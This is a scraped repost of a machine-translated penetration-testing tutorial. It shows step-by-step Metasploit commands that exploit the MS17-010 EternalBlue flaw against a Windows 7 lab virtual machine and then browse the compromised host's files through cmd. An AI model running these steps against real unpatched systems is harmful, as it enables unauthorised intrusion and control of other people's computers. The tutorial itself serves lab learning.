当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- Why do private enterprises do party building? ——Special subject study of geek state holding Party branch
- htmlcss
- After brushing leetcode's linked list topic, I found a secret!
- IPFS/Filecoin合法性:保护个人隐私不被泄露
- 基於MVC的RESTFul風格API實戰
- hadoop 命令总结
- 关于Kubernetes 与 OAM 构建统一、标准化的应用管理平台知识!(附网盘链接)
- Asp.Net Core學習筆記:入門篇
- 有关PDF417条码码制的结构介绍
- 【快速因數分解】Pollard's Rho 演算法
猜你喜欢
全球疫情加速互联网企业转型,区块链会是解药吗?
The difference between Es5 class and ES6 class
DRF JWT authentication module and self customization
PHPSHE 短信插件说明
Swagger 3.0 天天刷屏,真的香嗎?
多机器人行情共享解决方案
Aprelu: cross border application, adaptive relu | IEEE tie 2020 for machine fault detection
DevOps是什么
采购供应商系统是什么?采购供应商管理平台解决方案
Jmeter——ForEach Controller&Loop Controller
随机推荐
EOS创始人BM: UE,UBI,URI有什么区别?
从海外进军中国,Rancher要执容器云市场牛耳 | 爱分析调研
drf JWT認證模組與自定製
C language 100 question set 004 - statistics of the number of people of all ages
基於MVC的RESTFul風格API實戰
【效能優化】納尼?記憶體又溢位了?!是時候總結一波了!!
Elasticsearch database | elasticsearch-7.5.0 application construction
简直骚操作,ThreadLocal还能当缓存用
給萌新HTML5 入門指南(二)
ThreadLocal原理大解析
How to select the evaluation index of classification model
Flink on paasta: yelp's new stream processing platform running on kubernetes
前端模組化簡單總結
如何将数据变成资产?吸引数据科学家
Using Es5 to realize the class of ES6
PHP应用对接Justswap专用开发包【JustSwap.PHP】
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
恕我直言,我也是才知道ElasticSearch条件更新是这么玩的
2018中国云厂商TOP5:阿里云、腾讯云、AWS、电信、联通 ...
Jmeter——ForEach Controller&Loop Controller